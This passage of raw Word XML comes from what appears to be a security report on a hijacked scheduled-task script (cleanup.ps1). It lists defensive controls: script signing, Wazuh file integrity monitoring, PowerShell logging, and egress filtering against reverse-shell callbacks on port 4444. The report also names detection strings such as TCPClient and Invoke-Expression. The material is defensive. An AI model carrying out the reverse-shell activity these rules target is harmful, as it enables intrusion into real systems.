          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This requires every script on the system to have a digital signature from a trusted internal authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A07E797" w14:textId="358103AE" w:rsidR="0051731C" w:rsidRPr="0051731C" w:rsidRDefault="0051731C" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Since an attacker cannot recreate a valid digital signature, the hijacked cleanup.ps1 would be blocked from executing because its "signature" would be broken or missing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DDC163" w14:textId="77777777" w:rsidR="0051731C" w:rsidRDefault="0051731C" w:rsidP="0051731C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E6F22A" w14:textId="77777777" w:rsidR="006E7C0C" w:rsidRPr="006E7C0C" w:rsidRDefault="006E7C0C" w:rsidP="006E7C0C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>4. Centralized Directory for Privileged Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE501FC" w14:textId="0FD2BF64" w:rsidR="006E7C0C" w:rsidRPr="006E7C0C" w:rsidRDefault="006E7C0C" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Move all administrative scripts to a central, protected directory (e.g., C:\Program Files\AdminTools\).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289FA64" w14:textId="23051A60" w:rsidR="006E7C0C" w:rsidRPr="006E7C0C" w:rsidRDefault="006E7C0C" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply a "Strict Baseline" to this folder where only the Domain Admins group has </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525779A3" w14:textId="15D18D73" w:rsidR="006E7C0C" w:rsidRDefault="006E7C0C" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Prevents the accidental creation of "writable" scripts in random locations like C:\TaskScripts\.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A3189F" w14:textId="77777777" w:rsidR="00A864D0" w:rsidRDefault="00A864D0" w:rsidP="00A864D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF944CB" w14:textId="77777777" w:rsidR="00A864D0" w:rsidRPr="00A864D0" w:rsidRDefault="00A864D0" w:rsidP="00A864D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>5. Proactive Control: File Integrity Monitoring (FIM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0CF66" w14:textId="34678EE5" w:rsidR="00A864D0" w:rsidRPr="00A864D0" w:rsidRDefault="00A864D0" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Deploy FIM to track changes in sensitive directories like C:\TaskScripts\.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B169F9" w14:textId="03E1C66E" w:rsidR="00A864D0" w:rsidRPr="00A864D0" w:rsidRDefault="00A864D0" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Configure tools (e.g., Wazuh) to trigger high-severity alerts for any "Write" or "Modify" events on script files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B6134" w14:textId="07861845" w:rsidR="00A864D0" w:rsidRPr="00A864D0" w:rsidRDefault="00A864D0" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">To catch the attacker during the "Hijack" phase, allowing security teams to intervene before the malicious script is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>actually executed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684F3270" w14:textId="77777777" w:rsidR="00F45111" w:rsidRDefault="00F45111" w:rsidP="00F45111">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E54E56" w14:textId="6F43C79E" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00C05C82" w:rsidP="00F45111">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>6. Enhanced PowerShell Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB06F2" w14:textId="22AD4B4F" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00F45111" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Ensure Script Block Logging (Event ID 4104) is enabled across the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44463340" w14:textId="6D2ED2FD" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00F45111" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Use Group Policy (GPO) to enable detailed logging for all PowerShell activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54290713" w14:textId="38612414" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00F45111" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>To provide the specific telemetry needed to catch malicious strings, such as TCPClient or Invoke-Expression, as seen in your Wazuh alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407A856" w14:textId="77777777" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00F45111" w:rsidP="00F45111">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4501422A" w14:textId="451C6229" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00C05C82" w:rsidP="00F45111">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>7. Network-Level Egress Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C540C10" w14:textId="5D2C46AB" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00F45111" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Configure host or perimeter firewalls to block outbound traffic on non-standard ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5FB49B" w14:textId="21693BEA" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00F45111" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Restrict server communication to only necessary ports and known-good IP addresses, specifically blocking common "hacker" ports like 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A05C46" w14:textId="01B1E9F6" w:rsidR="00F45111" w:rsidRPr="00F45111" w:rsidRDefault="00F45111" w:rsidP="002E72EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>To prevent a successful "callback" to an attacker's machine, effectively breaking the reverse shell even if the script executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC93D86" w14:textId="77777777" w:rsidR="00F45111" w:rsidRPr="00ED1773" w:rsidRDefault="00F45111" w:rsidP="00F45111">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8C1C44" w14:textId="77777777" w:rsidR="00327ECF" w:rsidRDefault="00327ECF" w:rsidP="00500AD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1032A301" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="00D01BC9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A42945" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="004D5913" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc220896692"/>
      <w:commentRangeStart w:id="33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:commentRangeEnd w:id="33"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="33"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3823"/>
        <w:gridCol w:w="5359"/>
      </w:tblGrid>
      <w:tr w:rsidR="00500AD9" w:rsidRPr="004D5913" w14:paraId="33ECB567" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11CFEF9F" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="004D5913" w:rsidRDefault="00500AD9" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Description of Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71285909" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="004D5913" w:rsidRDefault="00500AD9" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00500AD9" w:rsidRPr="004D5913" w14:paraId="640C5BAA" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AF80DB5" w14:textId="471DD364" w:rsidR="00500AD9" w:rsidRPr="00D01BC9" w:rsidRDefault="0028278F" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK: Scheduled Task (T1053.005)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088C9FEE" w14:textId="71CD4703" w:rsidR="00500AD9" w:rsidRDefault="003971D5" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1053/005/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="393291B3" w14:textId="61F05129" w:rsidR="003971D5" w:rsidRPr="00D01BC9" w:rsidRDefault="003971D5" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00500AD9" w:rsidRPr="004D5913" w14:paraId="39C1F1CE" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49256837" w14:textId="2BC6BA3F" w:rsidR="00500AD9" w:rsidRPr="00D01BC9" w:rsidRDefault="004544E0" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Wazuh: Log Data Collection and Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1BEF8E" w14:textId="6D09E24D" w:rsidR="00350A6F" w:rsidRPr="00D01BC9" w:rsidRDefault="00350A6F" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId46" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://documentation.wazuh.com/current/user-manual/capabilities/log-data-collection/how-it-</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:lastRenderedPageBreak/>
                <w:t>works.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00350A6F" w:rsidRPr="004D5913" w14:paraId="0C8BD997" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29C82918" w14:textId="6CCF02B0" w:rsidR="00350A6F" w:rsidRPr="004544E0" w:rsidRDefault="00072416" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Qualys: Defending Against Scheduled Task Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EDD5827" w14:textId="6BAF0556" w:rsidR="00956CE0" w:rsidRDefault="00956CE0" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C4892" w:rsidRPr="004D5913" w14:paraId="682C84EF" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7380298D" w14:textId="1E99F7C7" w:rsidR="006C4892" w:rsidRPr="00072416" w:rsidRDefault="006C4892" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Microsoft: File Access Control Lists (ACLs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16C6EADB" w14:textId="63B6F85A" w:rsidR="000E568D" w:rsidRDefault="000E568D" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-lists</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E568D" w:rsidRPr="004D5913" w14:paraId="2AC111FD" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00E5A79C" w14:textId="0E0C6772" w:rsidR="000E568D" w:rsidRPr="006C4892" w:rsidRDefault="000E568D" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Artifical Intelligence (AI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="659AD741" w14:textId="62010B99" w:rsidR="000E568D" w:rsidRPr="00E03AF5" w:rsidRDefault="00E03AF5" w:rsidP="002E72EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Grammarly (to correct spelling and grammar)</w:t>
            </w:r>
          </w:p>
